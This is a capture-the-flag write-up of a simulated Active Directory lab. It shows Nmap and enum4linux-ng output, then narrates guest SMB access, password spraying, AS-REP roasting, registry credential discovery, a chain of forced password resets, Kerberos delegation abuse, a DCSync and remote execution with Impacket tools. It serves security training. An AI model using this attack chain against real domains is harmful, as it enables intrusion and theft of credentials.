Difficulty: Hard
Step into the shoes of a red teamer in our simulated hack challenge! Navigate a realistic organizational environment with up-to-date defenses.
Test your penetration skills, bypass security measures, and infiltrate into the system. Will you emerge victorious as you simulate the ultimate organization APT?
Find all the flags!
Initial Enumeration #
Network Scan (cleaned output) #
┌──(parallels㉿Kali)-[~/targets/Reset]
└─$ cat scan.txt
# Nmap 7.98 scan initiated Tue Jan 27 20:06:23 2026 as: /usr/lib/nmap/nmap --privileged -vvv -p 53,88,139,135,389,445,464,593,636,3269,3268,3389,7680,9389,49669,49670,49673,49671,49675,49700,49695 -4 -sC -sV -A -oN scan.txt 10.82.173.170
Nmap scan report for 10.82.173.170
Host is up, received echo-reply ttl 126 (0.12s latency).
Scanned at 2026-01-27 20:06:24 EST for 111s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 126 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-01-28 01:06:31Z)
135/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 126
464/tcp open kpasswd5? syn-ack ttl 126
593/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 126
3268/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 126
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM
| NetBIOS_Domain_Name: THM
| NetBIOS_Computer_Name: HAYSTACK
| DNS_Domain_Name: thm.corp
| DNS_Computer_Name: HayStack.thm.corp
| DNS_Tree_Name: thm.corp
| Product_Version: 10.0.17763
|_ System_Time: 2026-01-28T01:07:31+00:00
|_ssl-date: 2026-01-28T01:08:10+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Issuer: commonName=HayStack.thm.corp
7680/tcp open pando-pub? syn-ack ttl 126
9389/tcp open mc-nmf syn-ack ttl 126 .NET Message Framing
49669/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49673/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49675/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49695/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49700/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 27 20:08:15 2026 -- 1 IP address (1 host up) scanned in 112.56 secondsKey Observations:
- Domain Controller identified: HAYSTACK.thm.corp
- Active Directory services exposed (Kerberos, LDAP, SMB, RPC)
- Windows Server 2019 (Build 17763)
SMB & Domain Enumeration #
Enum4Linux-ng #
┌──(parallels㉿Kali)-[~/targets/Reset]
└─$ enum4linux-ng -A 10.82.173.170 -oA results.txt
ENUM4LINUX - next generation (v1.3.7)
==========================
| Target Information |
==========================
[*] Target ........... 10.82.173.170
[*] Username ......... ''
[*] Random Username .. 'asgknuzf'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
======================================
| Listener Scan on 10.82.173.170 |
======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
=====================================================
| Domain Information via LDAP for 10.82.173.170 |
=====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: thm.corp
============================================================
| NetBIOS Names and Workgroup/Domain for 10.82.173.170 |
============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
==========================================
| SMB Dialect Check on 10.82.173.170 |
==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.0.2: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
============================================================
| Domain Information via SMB session for 10.82.173.170 |
============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: HAYSTACK
NetBIOS domain name: THM
DNS domain: thm.corp
FQDN: HayStack.thm.corp
Derived membership: domain member
Derived domain: THM
==========================================
| RPC Session Check on 10.82.173.170 |
==========================================
[*] Check for anonymous access (null session)
[+] Server allows authentication via username '' and password ''
[*] Check for guest access
[+] Server allows authentication via username 'asgknuzf' and password ''
[H] Rerunning enumeration with user 'asgknuzf' might give more results
====================================================
| Domain Information via RPC for 10.82.173.170 |
====================================================
[+] Domain: THM
[+] Domain SID: S-1-5-21-1966530601-3185510712-10604624
[+] Membership: domain member
================================================
| OS Information via RPC for 10.82.173.170 |
================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null
======================================
| Users via RPC on 10.82.173.170 |
======================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED
=======================================
| Groups via RPC on 10.82.173.170 |
=======================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED
=======================================
| Shares via RPC on 10.82.173.170 |
=======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
==========================================
| Policies via RPC for 10.82.173.170 |
==========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed
==========================================
| Printers via RPC for 10.82.173.170 |
==========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIEDKey Findings:
- Null session allowed
- Guest access allowed
- Domain SID disclosed
The presence of guest access made me immediately check smb
SMB Guest Access #
Using nxc, SMB guest authentication was confirmed.
Lets connect and list shares.
Found the share “Data”, so tried connecting to it as guest.
Extracting the plaintext file revealed default credential information:
┌──(parallels㉿Kali)-[~/targets/Reset]
└─$ cat 25tfl3fw.yqn.txt
Subject:
Welcome to Reset -�Dear <USER>,Welcome aboard! We are thrilled to haveyou join our team. As discussed during the hiring process, we are sending you the necessary login information to access your company account. **Please keep thisinformation confidential and do not share it with anyone.The initial passowrd is: ResetMe123!** We are confident that you will contribute significantly to our continued success. We look forward to working with you and wish you the very bestin your new role.Best regards,The Reset Teamwe found a default password for any accounts we may find.
ResetMe123!now we have a password, lets create a user list so that we can spray this password.
Building a user list #
We notice we cant list users directly with the rpcclient enumdomusers command
Direct RPC enumeration failed, so I tried rid brute forcing which uses the known domain SID we saw from Enum4Linux-ng to brute force users.
we can brute force sids by using impackets lookupsid.py script
After cleaning the output, I identified 42 domain users.
Credential Attacks #
with our user list, we can brute force logins by targeting smb spraying the default password we found.
we get a successful login for the user LiLy_Oneill:ResetMe123!
AS-REP Roasting #
I also tried as-rep roasting our users and we found 3 users with pre-auth enabled so their hashes were dumped.
Cracking the hashes with rockyou.txt yielded valid credentials:
TABATHA_BRITT@THM.CORP:marlboro(1985)so far, we have two valid users with credentials
TABATHA_BRITT@THM.CORP:marlboro(1985)
LILY_ONEILL@THM.CORP:ResetMe123!i want to find user flag
Initial Access #
RDP access as TABATHA_BRITT was successful, but no user flag was present.
After searching widely, i found no user flag under the user Tabatha_britt
so I tried to RDP as Lily, which didnt work as the password was expired.
Rabbit hole #
when i saw password expiry, and the credentials being resetme, and the room being named reset, I thought I should try to reset Lilys password to see if we could gain access.
But it didnt work.
Privilege Escalation #
after giving up on finding the user flag because tabatha had no desktop, I hosted privesccheck.ps1 on my attacker machine and downloaded it on the target.
I then ran the PrivescCheck.ps1
key finding
A misconfiguration is present where clear text credentials are present in the registry, we now have credentials for the user automate:Passw0rd1, lets impersonate this user with the credential we found.
now that we are logged in lets get user.txt
Perfect, we got our first flag. Now its time to get system.
Active Directory Attack Path Discovery #
With a foothold established, and our first flag found, I pivoted to BloodHound for attack path analysis.
I used sharphound to pull data from the target as the automate user.
The tryhackme connection unexpectedly reset. The new ip was set to 10.80.168.201
but we found a clear path to administrator from a user we own
After selecting our owned user as the start user, and the administrator user as the end goal. we found a direct attack path where we can force reset users passwords to eventually abuse delegation rights from the user darla winters to obtain the administrator user.
Discovered Privilege Escalation Chain #
1. owned user -> GenericAll -> SHAWNA_BRAY
2. SHAWNA_BRAY -> ForceChangePassword + WriteAccountRestrictions on CRUZ_HALL
3. CRUZ_HALL -> GenericWrite + ForceChangePassword on DARLA_WINTERS
4. DARLA_WINTERS -> AllowedToDelegate to HAYSTACK
5. HAYSTACK can CoerceToTGT from THM.CORP (Kerberos Delegation)
6. Leads to impersonation of ADMINISTRATORPassword Reset & Impersonation Chain #
lets change shawna_bray’s password then impersonate her by using runas to open a shell.
Now lets use our shell as shawna_bray to reset cruz_halls’ password. Then lets inpersonate him using the same method.
Now we use our shell as cruz_hall to reset darla_winters password and impersonate her using the same method.
now we can abuse darla_winters delegation privileges to impersonate the administrator user
Abusing Resource Based Constrained Delegation (RBCD) #
lets verify the users delegation rights
Using Impacket’s getST.py, I leveraged DARLA_WINTERS Kerberos delegation rights to impersonate the Administrator account and obtain a service ticket for the HAYSTACK host.
now we can export this ccache file to be able to use it
export KRB5CCNAME=administrator@cifs_HAYSTACK.thm.corp@THM.CORP.ccacheDomain compromise #
A DCSync was attempted and succeeded.
But logon restrictions prevented direct login. specifically time of day restrictions
so instead i tried remote command execution using atexec.py
This is a very useful tool by impacket that executes commands on a remote Windows system by creating and running a scheduled task over SMB/RPC.
Now that we have command execution as administrator we check if the root flag is in its standard location like most ctfs usually are.
And we successfully find the root flag.
Conclusion & Takeaways #
This was an excellent Active Directory lab that focused on :
- Enumeration over exploitation
- Credential hygiene failures
- Password reuse risks
- Delegation misconfigurations
- Realistic lateral movement
No single vulnerability led to compromise it is the chain of vulnerabilities that matters the most. This mirrors real enterprise breaches and reinforces why privilege relationships must be audited continuously.